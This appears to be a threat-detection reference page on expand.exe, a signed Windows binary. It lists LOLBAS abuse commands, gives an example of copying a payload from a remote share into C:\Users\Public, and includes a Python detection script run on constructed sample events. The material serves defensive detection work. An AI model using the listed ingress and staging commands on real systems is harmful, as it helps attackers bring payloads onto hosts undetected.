Process

unknown

expand.exe

expand.exe extracts files from Windows cabinet (.cab) archives and can also copy plain files. It is used legitimately during setup and servicing. Attackers use it to copy files, including from remote shares, through a signed binary: a simple ingress and staging trick.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS
  • expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat} (Download) · Use to copy the source file to the destination file
  • expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext} (Copy) · Copies files from A to B
  • expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat (ADS) · Copies files from A to B

Indicators

Hashes

Not observed.

Analysis

About this process

expand.exe expands compressed files from .cab archives to a destination, and it can also copy a plain file from a source to a destination. Both the source and destination can be UNC paths, so it reads and writes across the network. The genuine binary lives at C:\Windows\System32\expand.exe.

Legitimately, expand is used by Windows servicing and installers to unpack cabinet files. The source and destination on its command line are what give an instance meaning.

Security notes

expand.exe is a small ingress and staging tool (T1105). Because it copies files, including from and to UNC paths, an attacker uses expand \\host\share\payload.exe C:\Users\Public\p.exe to bring a file onto the host through a trusted, signed binary, or to stage files for the next step. A copy from a remote share, or an executable landing in a user-writable directory, is what gives it away.

Because expand has a genuine role in servicing, the source and destination are what matter. A remote source or a payload-looking destination under an unusual parent separates abuse from legitimate unpacking.

Anomaly signals
  • Image path other than C:\Windows\System32\expand.exe (high)
  • A remote (\\host\share) source or destination (high)
  • Writing an executable or script into a user-writable path (high)
  • Parent is an Office application, a script host, or an unfamiliar process (high)
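The security notes and the anomaly signals above describe the detection logic in prose. The Python below is an added example, not code from this page or from any vendor's product: it turns those four signals into rules and runs them over constructed process-creation events that use the Sysmon Event ID 1 field names Image, CommandLine and ParentImage. The parent allowlist, the executable-extension set and the user-writable path prefixes are assumptions to tune to an environment's own baseline; the extension check looks through an alternate-data-stream name so that the LOLBAS ADS variant listed above is caught as well.

```python
import re

# Added example (not from the page): rule-based triage of process-creation
# events for expand.exe, implementing the four anomaly signals listed above.
# Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage).

GENUINE_IMAGE = r"c:\windows\system32\expand.exe"   # the only path the page treats as genuine

# Assumed categories for the parent-process signal.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
# Parents that routinely invoke expand.exe in servicing or interactive use
# (assumption; replace with the environment's own baseline).
KNOWN_PARENTS = {"msiexec.exe", "trustedinstaller.exe", "tiworker.exe",
                 "setup.exe", "svchost.exe", "explorer.exe", "cmd.exe"}

# Assumed "payload-looking" extensions and user-writable roots.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

UNC_RE = re.compile(r"^\\\\[^\\]+\\")   # \\host\share\...


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    tokens, current, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def source_and_destination(cmdline):
    """Return expand's positional (source, destination) arguments.

    Switches such as -r, -d or -F:pattern are skipped; expand takes the
    source as the second-to-last and the destination as the last argument.
    """
    args = [t for t in split_cmdline(cmdline)[1:] if not t.startswith(("-", "/"))]
    if len(args) < 2:
        return None, None
    return args[-2], args[-1]


def file_extension(path):
    """Extension of the target, looking through an ADS name (notes.txt:file.bat)."""
    leaf = path.rsplit("\\", 1)[-1]
    if ":" in leaf:
        leaf = leaf.rsplit(":", 1)[-1]
    dot = leaf.rfind(".")
    return leaf[dot:].lower() if dot >= 0 else ""


def analyze(event):
    """Return the list of anomaly signals raised by one expand.exe event."""
    signals = []
    if event.get("Image", "").lower() != GENUINE_IMAGE:
        signals.append("image_path")

    src, dst = source_and_destination(event.get("CommandLine", ""))
    if any(p and UNC_RE.match(p) for p in (src, dst)):
        signals.append("remote_path")
    if (dst and dst.lower().startswith(USER_WRITABLE_PREFIXES)
            and file_extension(dst) in EXEC_EXTENSIONS):
        signals.append("exec_to_user_writable")

    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_APPS:
        signals.append("office_parent")
    elif parent in SCRIPT_HOSTS:
        signals.append("script_host_parent")
    elif parent not in KNOWN_PARENTS:
        signals.append("unfamiliar_parent")
    return signals


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": r'expand -r "C:\Windows\Installer\abc.cab" -F:* "C:\Program Files\App"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": r"expand \\fileserver\share\payload.exe C:\Users\Public\p.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\expand.exe",
     "CommandLine": r"expand \\10.0.0.5\c$\x.bat C:\Users\Public\notes.txt:file.bat",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\expand.exe",
     "CommandLine": r"expand C:\Users\bob\a.cab C:\Users\bob\out",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def triage(events):
    """Map each event index to its signals; an empty list means no signal fired."""
    return {i: analyze(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, signals in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", signals or "benign")
```

Only the first sample, a servicing-style unpack from C:\Windows\Installer by msiexec.exe, comes back clean; the remote-share copy into C:\Users\Public fires three signals at once, which matches the page's point that the source and destination, read together with the parent, are what separate abuse from legitimate unpacking.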

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.

References
